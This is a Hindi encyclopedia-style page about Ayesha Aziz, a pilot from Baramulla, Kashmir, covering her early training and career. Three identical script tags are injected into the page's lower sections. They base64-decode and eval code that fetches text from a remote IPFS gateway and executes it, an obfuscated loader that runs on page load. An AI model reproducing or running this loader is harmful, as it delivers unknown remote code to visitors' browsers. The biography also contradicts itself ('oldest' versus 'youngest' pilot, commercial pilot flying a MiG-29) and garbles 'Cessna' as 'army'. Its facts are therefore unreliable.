आयशा अज़ीज़

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
आयशा अज़ीज़

आयशा अज़ीज़ (अंग्रेज़ी: Ayesha Aziz) भारत की सबसे उम्र की महिला पायलट हैं। कश्मीर के बारामूला की 25 वर्षीय आयशा अज़ीज़ देश की सबसे कम उम्र की कमर्शियल पायलट हैं। 16 साल की उम्र में रूस में जेट मिग 29 विमान उड़ाने का प्रशिक्षण लिया। 2017 में कमर्शियल पायलट बनने का लाइसेंस हासिल किया। अब आयशा अज़ीज़ जेट मिग 29 विमान उड़ाती हैं।

  • बचपन से ही आयशा अज़ीज़ पायलट बनना चाहती थीं और उन्होंने कर भी दिखाया। 16 साल की उम्र में पायलट बनने वाली वह भारत की इकलौती महिला हैं।
  • 16 साल की उम्र में ही आयशा ने स्टूडेंट पायलट लाइसेंस हासिल कर लिया था। जिस उम्र में बच्चे ये सोचते रह जाते हैं कि किस स्ट्रीम से पढ़ाई की जाए। उस उम्र में आयशा ने अपना सपना पूरा कर लिया।
  • आयशा अज़ीज़ के अनुसार- "उसके सपने को पूरा करने में परिवार ने भरपूर साथ दिया। जैसे ही उनके पिता को उनके सपने के बारे में पता चला उन्होंने तुरंत उन्हें फ्लाइंग स्कूल भेज दिया। उस समय उन्होंने दसवीं कक्षा पास की थी।"
  • आयशा अज़ीज़ कश्मीर के बारामूला क्षेत्र के ख्वाजा गांव की रहने वाली हैं लेकिन फिलहाल मुंबई में रह रही हैं। वह सुनीता विलियम्स को अपना आदर्श मानती हैं। उन्हें नई जगहों पर घूमना और लोगों से मेलजोल बढ़ाना बहुत पसंद है।
  • आयशा अज़ीज़ ने अपने कॅरियर की शुरुआत सेना के 152 और 172 एयरक्राफ्ट उड़ाकर की। वह अपनी प्रेरणास्रोत सुनिया विलियम्स से भी मिल चुकी हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>